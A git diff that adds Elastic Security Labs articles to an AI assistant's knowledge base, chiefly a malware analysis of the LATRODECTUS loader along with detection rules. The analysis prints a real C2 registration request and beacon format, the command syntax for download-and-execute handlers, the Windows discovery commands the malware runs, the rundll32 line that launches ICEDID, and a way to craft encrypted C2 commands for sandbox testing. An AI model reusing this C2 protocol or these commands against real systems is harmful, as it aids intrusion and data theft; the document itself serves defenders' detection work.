+This malware is representative of many campaigns targeting macOS today. Our report on the DPRK malware KANDYKORN shows that these campaigns are modular, encompassing multiple stages of payloads with capabilities and functionality distributed between these payloads to avoid detection. You can see that with UltraEdit, one payload serves as the interactive backdoor and the other as the persistence mechanism. Malware like this can often easily update to avoid signatures. Still, as we have shown, behavior rules are unavoidable and allow us to bridge the gap between static signatures and machine learning models. 
+
+Behavior-based rules are very powerful if you have the right data and the ability to correlate that data. Our endpoint behavior rules can detect and prevent malware regardless of whether it updates or not. We have over 200+ endpoint behavior rules on macOS alone, including versions of those shown in this publication, that allow us to detect and prevent previously “undetected” malware by observing its actions in real time. If you want to check out our production endpoint behavior rules, they can be found [here](https://github.com/elastic/protections-artifacts). To learn more about our query languages, you can look here ([EQL](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql.html) and [ES|QL](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-getting-started.html)). We are proud to be an open source company and want to let our software and features speak for themselves. If you want to test and explore these features for yourself, you can easily create an [Elastic Cloud](https://www.elastic.co/cloud) Account with a 30-day trial license, or for local testing, you can download “[The Elastic Container Project](https://github.com/peasead/elastic-container)” and set the license value to trial in the `.env` file. 
+
+## References
+
+* [https://twitter.com/malwrhunterteam/status/1745959438140297697](https://twitter.com/malwrhunterteam/status/1745959438140297697)
+* [https://objective-see.org/blog/blog_0x79.html](https://objective-see.org/blog/blog_0x79.html)
+* [https://jamf.com/blog/jtl-malware-pirated-applications](https://jamf.com/blog/jtl-malware-pirated-applications/)
+* [https://developer.apple.com/documentation/endpointsecurity](https://developer.apple.com/documentation/endpointsecurity) 
\ No newline at end of file
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/sneak_peek_elastic_2022_global_threat_report.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/sneak_peek_elastic_2022_global_threat_report.md
new file mode 100644
index 0000000000000..d7d4db04fdf21
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/sneak_peek_elastic_2022_global_threat_report.md
@@ -0,0 +1,25 @@
+---
+title: "Sneak Peek: Elastic’s 2022 Global Threat Report"
+slug: "sneak-peek-elastic-2022-global-threat-report"
+date: "2022-11-30"
+description: "Elastic Security Labs has compiled the 2022 Global Threat Report to share trends and tactics adversaries and attack groups use, as observed by our threat research team and broader user community over the past year."
+author:
+  - slug: elastic-security-labs
+image: "blog-open-security-720x420-B.jpg"
+category:
+  - slug: reports
+---
+
+The [Elastic Security Labs](http://www.elastic.co/security-labs) team is passionate about securing the world’s data from attack, and strives to raise the bar within the security industry. To this end, Elastic Security Labs has compiled the [2022 Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report) to share trends and tactics adversaries and attack groups use, as observed by our threat research team and broader user community over the past year.
+
+Let’s dig into a few of the endpoint related findings:
+
+1. 72% of all defense evasion techniques consisted of masquerading and system binary proxy execution
+
+2. ~77% of all credential access techniques are attributed to OS credential dumping with commonly known utilities
+
+Here’s a chart on how the endpoint techniques breakdown across our data set.
+
+![](/assets/images/sneak-peek-elastic-2022-global-threat-report/image1.png)
+
+This was just a preview of the research coming your way. We have lots of findings and recommendations coming your way soon. Stay tuned to [Elastic Security Labs](http://www.elastic.co/security-labs) for the [2022 Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report).
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/spring_cleaning_with_latrodectus.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/spring_cleaning_with_latrodectus.md
new file mode 100644
index 0000000000000..36ab692f7db35
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/spring_cleaning_with_latrodectus.md
@@ -0,0 +1,583 @@
+---
+title: "Spring Cleaning with LATRODECTUS: A Potential Replacement for ICEDID"
+slug: "spring-cleaning-with-latrodectus"
+date: "2024-05-16"
+subtitle: "The LATRODECTUS loader evolves to deliver ICEDID and other malware"
+description: "Elastic Security Labs has observed an uptick in a recent emerging loader known as LATRODECTUS. This lightweight loader packs a big punch with ties to ICEDID and may turn into a possible replacement to fill the gap in the loader market."
+author:
+  - slug: daniel-stepanic
+  - slug: samir-bousseaden
+image: "Security Labs Images 16.jpg"
+category:
+  - slug: malware-analysis
+tags:
+  - icedid
+  - latrodectus
+  - loader
+---
+
+## LATRODECTUS at a glance
+
+First [discovered](https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39) by Walmart researchers in October of 2023, [LATRODECTUS](https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111) is a malware loader gaining popularity among cybercriminals. While this is considered a new family, there is a strong link between LATRODECTUS and [ICEDID](https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary) due to behavioral and developmental similarities, including a command handler that downloads and executes encrypted payloads like ICEDID. Proofpoint and Team Cymru built upon this connection to discover a [strong link](https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice) between the network infrastructure used by both the operators of ICEDID and LATRODECTUS.
+
+LATRODECTUS offers a comprehensive range of standard capabilities that threat actors can utilize to deploy further payloads, conducting various activities after initial compromise. The code base isn’t obfuscated and contains only 11 command handlers focused on enumeration and execution. This type of loader represents a recent wave observed by our team such as [PIKABOT](https://www.elastic.co/security-labs/pikabot-i-choose-you), where the code is more lightweight and direct with a limited number of handlers. 
+
+This article will focus on LATRODECTUS itself, analyzing its most significant features and sharing resources for addressing this financially impactful threat.
+
+### Key takeaways
+
+ - Initially discovered by Walmart researchers last year, LATRODECTUS continues to gain adoption among recent financially-motivated campaigns
+ - LATRODECTUS, a possible replacement for ICEDID shares similarity to ICEDID including a command handler to execute ICEDID payloads
+ - We observed new event handlers (process discovery, desktop file listing) since its inception and integration of a self-delete technique to delete running files
+ - Elastic Security provides a high degree of capability through memory signatures, behavioral rules, and hunting opportunities to respond to threats like LATRODECTUS
+
+### LATRODECTUS campaign overview
+
+Beginning early March of 2024, Elastic Security Labs observed an increase in email campaigns delivering LATRODECTUS. These campaigns typically involve a recognizable infection chain involving oversized JavaScript files that utilize WMI’s ability to invoke msiexec.exe and install a remotely-hosted MSI file, remotely hosted on a WEBDAV share.
+
+![](/assets/images/spring-cleaning-with-latrodectus/image44.png)
+
+With major changes in the loader space during the past year, such as the [QBOT](https://www.elastic.co/security-labs/qbot-malware-analysis) takedown and [ICEDID](https://www.elastic.co/security-labs/unpacking-icedid) dropping off, we are seeing new loaders such as [PIKABOT](https://www.elastic.co/security-labs/pikabot-i-choose-you) and [LATRODECTUS](https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111) have emerged as possible replacements.
+
+## LATRODECTUS analysis
+
+Our LATRODECTUS [sample](https://www.virustotal.com/gui/file/aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c/details) comes initially packed with file information [masquerading](https://attack.mitre.org/techniques/T1036/) as a component to Bitdefender’s kernel-mode driver (TRUFOS.SYS), shown in the following image.
+
+![File version information of packed LATRODECTUS sample](/assets/images/spring-cleaning-with-latrodectus/image47.png)
+
+
+In order to move forward with malware analysis, the sample must be unpacked manually or via an automatic unpacking service such as [UnpacMe](http://Unpac.Me).
+
+![UnpacMe summary](/assets/images/spring-cleaning-with-latrodectus/image26.png)
+
+
+LATRODECTUS is a DLL with 4 different exports, and each export is assigned the same export address.
+
+![Exports for LATRODECTUS](/assets/images/spring-cleaning-with-latrodectus/image21.png)
+
+
+### String obfuscation 
+
+All of the strings within LATRODECTUS are protected using a straightforward algorithm on the encrypted bytes and applying a transformation by performing arithmetic and bitwise operations. The initial [report](https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39) published in 2023 detailed a PRNG algorithm that was not observed in our sample, suggesting continuous development of this loader. Below is the algorithm implemented in Python using our [nightMARE framework](https://github.com/elastic/labs-releases/tree/main/nightMARE):
+
+``` python
+def decrypt_string(encrypted_bytes: bytes) -> bytes:
+    x = cast.u32(encrypted_bytes[:4])
+    y = cast.u16(encrypted_bytes[4:6])
+    byte_size = cast.u16(cast.p32(x ^ y)[:2])
+    decoded_bytes = bytearray(byte_size)
+
+    for i, b in enumerate(encrypted_bytes[6 : 6 + byte_size]):
+        decoded_bytes[i] = ((x + i + 1) ^ b) % 256
+
+    return bytes(decoded_bytes)
+```
+
+### Runtime API
+
+LATRODECTUS obfuscates the majority of its imports until runtime. At the start of the program, it queries the PEB in combination with using a CRC32 checksum to resolve ```kernel32.dll``` and ```ntdll.dll``` modules and their functions. In order to resolve additional libraries such as ```user32.dll``` or ```wininet.dll```, the malware takes a different approach performing a wildcard search (```*.dll```) in the Windows system directory. It retrieves each DLL filename and passes them directly to a CRC32 checksum function. 
+
+![DLL search using a CRC32 checksum](/assets/images/spring-cleaning-with-latrodectus/image15.png)
+
+
+### Anti-analysis
+When all the imports are resolved, LATRODECTUS performs several serial anti-analysis checks. The first monitors for a debugger by looking for the BeingDebugged flag inside the Process Environment Block (PEB). If a debugger is identified, the program terminates.
+
+![```BeingDebugged``` check via PEB](/assets/images/spring-cleaning-with-latrodectus/image35.png)
+
+
+In order to avoid sandboxes or virtual machines that may have a low number of active processes, two validation checks are used to combine the number of running processes with the OS product version. 
+
+![Number of processes and OS validation checks](/assets/images/spring-cleaning-with-latrodectus/image30.png)
+
+
+In order to account for the major differences between Windows OS versions, the developer uses a custom enum based on the major/minor version, and build numbers within Windows.
+
+![Enum related to build numbers, OS version](/assets/images/spring-cleaning-with-latrodectus/image4.png)
+
+
+The two previous conditions translate to:
+
+ - LATRODECTUS will exit if the number of processes is less than 75 and the OS version is a recent build such as Windows 10, Windows Server 2016, or Windows 11
+ - LATRODECTUS will exit if the number of processes is less than 50 and the OS version is an older build such as Windows Server 2003 R2, Windows XP, Windows 2000, Windows 7, Windows 8, or Windows Server 2012/R2
+
+After the sandbox check, LATRODECTUS verifies if the current process is running under WOW64, a subsystem of Windows operating systems that allows for 32-bit applications to run on 64-bit systems. If true (running as a 32-bit application on a 64-bit OS), the malware will exit.
+
+![```IsWow64Process``` check](/assets/images/spring-cleaning-with-latrodectus/image27.png)
+
+
+The last check is based on verifying the MAC address via the ```GetAdaptersInfo()``` call from ```iphlpapi.dll```. If there is no valid MAC Address, the malware will also terminate.
+
+![MAC Address check](/assets/images/spring-cleaning-with-latrodectus/image36.png)
+
+
+### Mutex
+
+This malware uses the string ```runnung``` as the mutex to prevent re-infection on the host, which may be an accidental typo on the part of developers.
+
+![Mutex](/assets/images/spring-cleaning-with-latrodectus/image29.png)
+
+
+### Hardware ID
+
+After the mutex creation, LATRODECTUS will generate a hardware ID that is seeded from the volume serial number of the machine in combination with multiplying a hard-coded constant (```0x19660D```).
+
+![HWID calculation](/assets/images/spring-cleaning-with-latrodectus/image6.png)
+
+
+### Campaign ID
+
+At this stage, the decrypted campaign name (```Littlehw```) from our sample is used as a seed passed into a Fowler–Noll–Vo hashing [function](https://en.wikipedia.org/wiki/Fowler%E2%80%93Noll%E2%80%93Vo_hash_function). This will produce a hash that is used by the actor to track different campaigns and associated victim machines.
+
+![Campaign ID calculation using FNV](/assets/images/spring-cleaning-with-latrodectus/image37.png)
+
+
+### Setup / persistence
+
+The malware will generate a folder path using a configuration parameter, these determine the location where LATRODECTUS will be dropped on disk, such as the following directories:
+ - ```AppData```
+ - ```Desktop```
+ - ```Startup```
+ - ```Personal```
+ - ```Local\AppData```
+
+Our sample was configured with the ```AppData``` location using a hard-coded directory string ```Custom_update``` along with a hardcoded filename ```Update_``` concatenated with digits seeded from the volume serial number. Below is the full file path inside our VM:
+
+```
+C:\Users\REM\AppData\Roaming\Custom_update\Update_88d58563.dll
+```
+
+The malware will check for an existing file ```AppData\Roaming\Custom_update\update_data.dat``` to read from, and if the file does not exist it will create the directory before writing a copy of itself in the directory.
+
+![LATRODECTUS written in ```AppData```](/assets/images/spring-cleaning-with-latrodectus/image7.png)
+
+
+After the file is copied, LATRODECTUS retrieves two C2 domains from the global configuration, using the previously-described string decryption function.
+
+![Decrypting C2 servers](/assets/images/spring-cleaning-with-latrodectus/image19.png)
+
+
+Before the main thread is executed for command dispatching, LATRODECTUS sets up a scheduled task for persistence using the Windows Component Object Model (COM). 
+
+![Scheduled task creation via COM](/assets/images/spring-cleaning-with-latrodectus/image14.png)
+
+
+In our sample, the task name is hardcoded as ```Updater``` and scheduled to execute upon successful logon.
+
+![Scheduled task properties](/assets/images/spring-cleaning-with-latrodectus/image12.png)
+
+
+### Self-deletion
+
+Self-deletion is one noteworthy technique incorporated by LATRODECTUS. It was [discovered](https://x.com/jonasLyk/status/1350401461985955840) by Jonas Lykkegaard and implemented by Lloyd Davies in the delete-self-poc [repo](https://github.com/LloydLabs/delete-self-poc). The technique allows LATRODECTUS to delete itself while the process is still running using an alternate data stream. 
+
+Elastic Security Labs has seen this technique adopted in malware such as the [ROOK](https://chuongdong.com/reverse%20engineering/2022/01/06/RookRansomware/#anti-detection-alternate-data-streams) ransomware family. The likely objective is to hinder incident response processes by interfering with collection and analysis. The compiled malware contains a [string](https://github.com/LloydLabs/delete-self-poc/blob/49fe92218fdcfe8e173aa60a9eb307bae07cb027/main.h#L10) (```:wtfbbq```) present in the repository.
+
+![Self-deletion code in LATRODECTUS](/assets/images/spring-cleaning-with-latrodectus/image2.png)
+
+
+This technique is observed at the start of the infection as well as when the malware performs an update using event handler #15. Elastic Security Labs has created a [CAPA rule](https://github.com/mandiant/capa-rules/blob/master/anti-analysis/anti-forensic/self-deletion/self-delete-using-alternate-data-streams.yml) to help other organizations identify this behavior generically when analyzing various malware.
+
+### Communication
+
+LATRODECTUS encrypts its requests using base64 and RC4 with a hardcoded password of ```12345```. The first POST request over HTTPS that includes victim information along with configuration details, registering the infected system.
+
+```
+POST https://aytobusesre.com/live/ HTTP/1.1
+Accept: */*
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
+Host: aytobusesre.com
+Content-Length: 256
+Cache-Control: no-cache
+
+M1pNDFh7flKrBaDJqAPvJ98BTFDZdSDWDD8o3bMJbpmu0qdYv0FCZ0u6GtKSN0g//WHAS2npR/HDoLtIKBgkLwyrIh/3EJ+UR/0EKhYUzgm9K4DotfExUiX9FBy/HeV7C4PgPDigm55zCU7O9kSADMtviAodjuRBVW3DJ2Pf5+pGH9SG1VI8bdmZg+6GQFpcFTGjdWVcrORkxBjCGq3Eiv2svt3+ZFIN126PcvN95YJ0ie1Puljfs3wqsW455V7O
+```
+![Initial registration request](/assets/images/spring-cleaning-with-latrodectus/image32.png)
+
+
+Below is an example of the decrypted contents sent in the first request:
+
+```
+counter=0&type=1&guid=249507485CA29F24F77B0F43D7BA&os=6&arch=1&username=user&group=510584660&ver=1.1&up=4&direction=aytobusesre.com&mac=00:0c:24:0e:29:85;&computername=DESKTOP-3C4ILHO&domain=-
+```
+
+| Name | Description |
+| ---- | ----------- |
+| counter | Number of C2 requests increments by one for each callback |
+| type | Type of request (registration, etc) |
+| guid | Generated hardware ID seeded by volume serial number |
+| os | Windows OS product version |
+| arch | Windows architecture version |
+| username | Username of infected machine |
+| group | Campaign identifier seeded by unique string in binary with FNV |
+| version | LATRODECTUS version |
+| up | Unknown |
+| direction | C2 domain
+| mac | MAC Address |
+| computername | Hostname of infected machine |
+| domain | Domain belonging to infected machine |
+
+Each request is pipe-delimited by an object type, integer value, and corresponding argument. There are 4 object types which route the attacker controlled commands (**CLEARURL**, **URLS**, **COMMAND**, **ERROR**).  
+
+![Command dispatching logic](/assets/images/spring-cleaning-with-latrodectus/image39.png)
+
+
+The main event handlers are passed through the **COMMAND** object type with the handler ID and their respective argument.
+
+```
+COMMAND|12|http://www.meow123.com/test 
+```
+
+The **CLEARURL** object type is used to delete any configured domains. The **URLS** object type allows the attacker to swap to a new C2 URL. The last object type, **ERROR**, is not currently configured.
+
+![Example of command request via CyberChef](/assets/images/spring-cleaning-with-latrodectus/image11.png)
+
+
+### Bot Functionality
+
+LATRODECTUS’s core functionality is driven through its command handlers. These handlers are used to collect information from the victim machine, provide execution capabilities as well as configure the implant. We have seen two additional handlers (retrieve processes, desktop listing) added since the initial [publication](https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39) which may be a sign that the codebase is still active and changing. 
+
+
+| Command ID | Description |
+| ---------- | ----------- |
+| 2 | Retrieve file listing from desktop directory |
+| 3 | Retrieve process ancestry |
+| 4 | Collect system information |
+| 12 | Download and execute PE |
+| 13 | Download and execute DLL |
+| 14 | Download and execute shellcode |
+| 15 | Perform update, restart |
+| 17 | Terminate own process and threads |
+| 18 | Download and execute ICEDID payload |
+| 19 | Increase Beacon Timeout |
+| 20 | Resets request counter |
+
+#### Desktop listing - command ID (2)
+
+This command handler will retrieve a list of the contents of the user’s desktop, which the developer refers to as ```desklinks```. This data will be encrypted and appended to the outbound beacon request. This is used for enumerating and validating victim environments quickly.
+
+![Desktop listing (Handler #2)](/assets/images/spring-cleaning-with-latrodectus/image16.png)
+
+
+**Example request**:
+
+```
+counter=0&type=1&guid=249507485CA29F24F77B0F43D7BA&os=6&arch=1&username=user&group=510584660&ver=1.1&up=4&direction=aytobusesre.com&desklinks=["OneDrive.lnk","OneNote.lnk","PowerPoint.lnk","Notepad++.lnk","Excel.lnk","Google Chrome.lnk","Snipping Tool.lnk","Notepad.lnk","Paint.lnk"]
+```
+
+#### Process ancestry - command ID (3)
+
+This event handler is referenced as **proclist** by the developer where it collects the entire running process ancestry from the infected machine via the **CreateToolhelp32Snapshot** API. 
+
+![Retrieve process ancestry (Handler #3)](/assets/images/spring-cleaning-with-latrodectus/image25.png)
+
+
+Like security researchers, malware authors are interested in process parent/child relationships for decision-making. The authors of LATRODECTUS even collect information about process grandchildren, likely to validate different compromised environments.
+
+![Example of process ancestry collected by LATRODECTUS](/assets/images/spring-cleaning-with-latrodectus/image17.png)
+
+
+#### Collect system information - command ID (4)
+
+This command handler creates a new thread that runs the following system discovery/enumeration commands, each of which is a potential detection opportunity:
+
+``` bash
+C:\Windows\System32\cmd.exe /c ipconfig /all
+C:\Windows\System32\cmd.exe /c systeminfo
+C:\Windows\System32\cmd.exe /c nltest /domain_trusts
+C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
+C:\Windows\System32\cmd.exe /c net view /all /domain
+C:\Windows\System32\cmd.exe /c net view /all
+C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain
+C:\Windows\System32\wbem\wmic.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
+C:\Windows\System32\cmd.exe /c net config workstation
+C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
+C:\Windows\System32\cmd.exe /c whoami /groups
+```
+
+Each output is placed into URI with corresponding collected data:
+
+```
+&ipconfig=
+&systeminfo=
+&domain_trusts=
+&domain_trusts_all=
+&net_view_all_domain=
+&net_view_all=
+&net_group=
+&wmic=
+&net_config_ws=
+&net_wmic_av=
+&whoami_group=
+```
+
+#### Download and execute PE - command ID (12)
+
+This handler downloads a PE file from the C2 server then writes the content to disk with a randomly generated file name, then executes the file.
+
+![Download and Run PE function (Handler #4)](/assets/images/spring-cleaning-with-latrodectus/image19.png)
+
+
+Below is an example in our environment using this handler:
+
+![Process tree of download and run PE function](/assets/images/spring-cleaning-with-latrodectus/image34.png)
+
+
+#### Download and execute DLL - command ID (13)
+
+This command handler downloads a DLL from C2 server, writes it to disk with a randomly generated file name, and executes the DLL using rundll32.exe.
+
+![Download and run DLL function (Handler #13)](/assets/images/spring-cleaning-with-latrodectus/image10.png)
+
+
+#### Download and execute shellcode - command (14)
+
+This command handler downloads shellcode from the C2 server via ```InternetReadFile```, allocates and copies the shellcode into memory then directly calls it with a new thread pointing at the shellcode.
+
+![Shellcode execution (Handler #14)](/assets/images/spring-cleaning-with-latrodectus/image24.png)
+
+
+#### Update / restart  - command ID (15)
+
+This handler appears to perform a binary update to the malware where it’s downloaded, the existing thread/mutex is notified, and then released. The file is subsequently deleted and a new binary is downloaded/executed before terminating the existing process.
+
+![Update handler (Handler #15)](/assets/images/spring-cleaning-with-latrodectus/image33.png)
+
+
+#### Terminate - command ID (17)
+This handler will terminate the existing LATRODECTUS process.
+
+![Self-termination (Handler #17)](/assets/images/spring-cleaning-with-latrodectus/image46.png)
+
+
+#### Download and execute hosted ICEID payload - command ID (18)
+
+This command handler downloads two ICEDID components from a LATRODECTUS server and executes them using a spawned ```rundll32.exe``` process. We haven’t personally observed this being used in-the-wild, however.
+
+The handler creates a folder containing two files to the ```AppData\Roaming\``` directory. These file paths and filenames are seeded by a custom random number generator which we will review in the next section. In our case, this new folder location is: 
+
+```
+C:\Users\REM\AppData\Roaming\-632116337
+```
+
+It retrieves a file (```test.dll```) from the C2 server, the standard ICEDID loader, which is written to disk with a randomly -generated file name (```-456638727.dll```).
+
+![LATRODECTUS downloading ICEDID loader](/assets/images/spring-cleaning-with-latrodectus/image9.png)
+
+
+LATRODECTUS will then perform similar steps by generating a random filename for the ICEDID payload (```1431684209.dat```). Before performing the download, it will set-up the arguments to properly load ICEDID. If you have run into ICEDID in the past, this part of the command-line should look familiar: it’s used to call the ICEDID export of the loader, while passing the relative path to the encrypted ICEDID payload file.
+
+```
+init -zzzz="-632116337\1431684209.dat"
+```
+
+![LATRODECTUS downloading ICEDID data](/assets/images/spring-cleaning-with-latrodectus/image20.png)
+
+
+LATRODECUS initiates a second download request using a hard-coded URI (```/files/bp.dat```) from the configured C2 server, which is written to a file (```1431684209.dat```). Analyzing the ```bp.dat``` file, researchers identified it as a conventional encrypted ICEDID payload, commonly referenced as ```license.dat```.
+
+![Encrypted ICEDID payload (```bp.dat```)](/assets/images/spring-cleaning-with-latrodectus/image31.png)
+
+
+After decrypting the file, malware researchers noted a familiar 129 byte sequence of junk bytes prepended to the file followed by the custom section headers. 
+
+![Decrypted ICEDID payload (```bp.dat```)](/assets/images/spring-cleaning-with-latrodectus/image43.png)
+
+
+Our team was able to revisit [prior tooling](https://www.elastic.co/security-labs/unpacking-icedid) and successfully decrypt this file, enabling us to rebuild the PE (ICEDID).
+
+![ICEDID YARA triggering on rebuilt PE from ```bp.dat```](/assets/images/spring-cleaning-with-latrodectus/image28.png)
+
+
+At this point, the ICEDID loader and encrypted payload have been downloaded to the same folder.
+
+![](/assets/images/spring-cleaning-with-latrodectus/image38.png)
+
+These files are then executed together using ```rundll32.exe``` via **CreateProcessW** with their respective arguments. Below is the observed command-line:
+
+```
+rundll32.exe C:\Users\REM\AppData\Roaming\-632116337\-456638727.dll,init -zzzz="-632116337\1431684209.dat"
+```
+
+![```Rundll32.exe``` execution](/assets/images/spring-cleaning-with-latrodectus/image18.png)
+
+
+Scanning the ```rundll32.exe``` child process spawned by LATRODECTUS with our ICEDID YARA rule also indicates the presence of the ICEDID. 
+
+![YARA memory scan detecting ICEDID](/assets/images/spring-cleaning-with-latrodectus/image41.png)
+
+
+#### Beacon timeout - command ID (19)
+
+LATRODECTUS supports jitter for beaconing to C2. This can make it harder for defenders to detect via network sources due to randomness this introduces to beaconing intervals.
+
+![Adjust timeout feature (Handler #19)](/assets/images/spring-cleaning-with-latrodectus/image45.png)
+
+
+In order to calculate the timeout, it generates a random number by seeding a combination of the user’s cursor position on the screen multiplied by the system’s uptime (```GetTickCount```). This result is passed as a parameter to **RtlRandomEx**. 
+
+![Random number generator using cursor position](/assets/images/spring-cleaning-with-latrodectus/image22.png)
+
+
+#### Reset counter - command ID (20)
+
+This command handler will reset the request counter that is passed on each communication request. For example, on the third callback it is filled with 3 here. With this function, the developer can reset the count starting from 0.
+
+```
+counter=3&type=4&guid=638507385
+```
+
+### LATRODECTUS / ICEDID connection
+
+There definitely is some kind of development connection or working arrangement between ICEDID and LATRODECTUS. Below are some of the similarities observed:
+ - Same enumeration commands in the system discovery handler
+ - The DLL exports all point to same export function address, this was a common observation with ICEDID payloads
+ - C2 data is concatenated together as variables in the C2 traffic requests
+ - The ```bp.dat``` file downloaded from handler (#18) is used to execute the ICEDID payload via ```rundll32.exe``` 
+ - The functions appear to be similarly coded
+
+![COM-based Scheduled Task setup - ICEDID vs LATRODECTUS](/assets/images/spring-cleaning-with-latrodectus/image13.png)
+
+
+Researchers didn’t conclude that there was a clear relationship between the ICEDID and LATRODECTUS families, though they appear at least superficially affiliated. ICEDID possesses more mature capabilities, like those used for data theft or the [BackConnect](https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol) module, and has been richly documented over a period of several years. One hypothesis being considered is that LATRODECTUS is being actively developed as a replacement for ICEDID, and the handler (#18) was included until malware authors were satisfied with LATRODECTUS’ capabilities.
+
+### Sandboxing LATRODECTUS
+
+To evaluate LATRODECTUS detections, we set up a Flask server configured with the different handlers to instruct an infected machine to perform various actions in a sandbox environment. This method provides defenders with a great opportunity to assess the effectiveness of their detection and logging tools against every capability. Different payloads like shellcode/binaries can be exchanged as needed.
+
+![Command handlers sandboxed](/assets/images/spring-cleaning-with-latrodectus/image42.png)
+
+
+As an example, for the download and execution of a DLL (handler #13), we can provide the following request structure (object type, handler, arguments for handler) to the command dispatcher:
+
+```
+COMMAND|13|http://www.meow123.com/dll, ShowMessage
+```
+
+The following example depicts the RC4-encrypted string described earlier, which has been base64-encoded.
+
+```
+E3p1L21QSBOqEKjYrBKiLNZJTk7KZn+HWn0p2LQfOLWCz/py4VkkAxSXXdnDd39p2EU=
+```
+
+Using the following CyberChef recipe, analysts can generate encrypted command requests:
+
+![Example with DLL Execution handler via CyberChef](/assets/images/spring-cleaning-with-latrodectus/image1.png)
+
+
+Using the actual malware codebase and executing these different handlers using a low-risk framework, defenders can get a glimpse into the events, alerts, and logs recorded by their security instrumentation. 
+
+## Detecting LATRODECTUS
+
+The following Elastic Defend protection features trigger during the LATRODECTUS malware infection process: 
+
+![Elastic Defend alerts against LATRODECTUS](/assets/images/spring-cleaning-with-latrodectus/image5.png)
+
+
+Below are the prebuilt MITRE ATT&CK-aligned rules with descriptions:
+
+| ATT&CK technique | Elastic Rule | Description |
+| ----- | ----- | ----- |
+| [T1059.007 - Javascript](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_oversized_windows_script_execution.toml) [T1027 - Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027/) | [Suspicious Oversized Script Execution](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/execution_oversized_windows_script_execution.toml) | LATRODECTUS is delivered via oversized Javascript files, on average more than 800KB filled with random text. |
+| [T1047 - Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047/) | [Execution via a Suspicious WMI Client](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/initial_access_execution_via_a_suspicious_wmi_client.toml) | Javascript dropper invokes WMI to mount a WEBDAV share and invokes msiexec to install a remote msi file. |
+| [T1218.007 - Misexec](https://attack.mitre.org/techniques/T1218/007/) | [Remote File Execution via MSIEXEC](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/defense_evasion_remote_file_execution_via_msiexec.toml) [Suspicious MsiExec Child Process](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/defense_evasion_suspicious_msiexec_child_process.toml) | MSI file hosted on remote Webdav and executed in quiet mode. Once executed it drops a DLL and launches rundll32 to load it via the Advanced installer viewer.exe binary. |
+| [T1218.011 - Rundll32](https://attack.mitre.org/techniques/T1218/011/) | [Rundll32 or Regsvr32 Loaded a DLL from Unbacked Memory](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/defense_evasion_rundll32_or_regsvr32_loaded_a_dll_from_unbacked_memory.toml) | Rundll32 loads the LATRODECTUS DLL from AppData and starts code injection. |
+| [T1055 - Process Injection](https://attack.mitre.org/techniques/T1055/) | [Memory Threat Detection Alert: Shellcode Injection](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html#memory-protection) [VirtualProtect API Call from an Unsigned DLL](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/defense_evasion_virtualprotect_api_call_from_an_unsigned_dll.toml) [Shellcode Execution from Low Reputation Module](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/defense_evasion_shellcode_execution_from_low_reputation_module.toml) [Network Module Loaded from Suspicious Unbacked Memory](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/defense_evasion_network_module_loaded_from_suspicious_unbacked_memory.toml) | Shellcode execution triggers 3 endpoint behavior alerts and a memory threat detection alert. |
+| [T1053.005 - Scheduled Task](https://attack.mitre.org/techniques/T1053/005/) | [Scheduled Task Creation by an Unusual Process](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/persistence_scheduled_task_creation_by_an_unusual_process.toml) | LATRODECTUS may persist using scheduled tasks (rundll32 will create a scheduled task). |
+| [T1070.004 - File Deletion](https://attack.mitre.org/techniques/T1070/004/) | [Potential Self Deletion of a Running Executable](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/defense_evasion_potential_self_deletion_of_a_running_executable.toml) | Part of the malware DLL self update command and also when the DLL is not running from AppData, LATRODECTUS will delete itself while running and restart from the new path or running an updated version of itself leveraging [this technique](https://github.com/LloydLabs/delete-self-poc). |
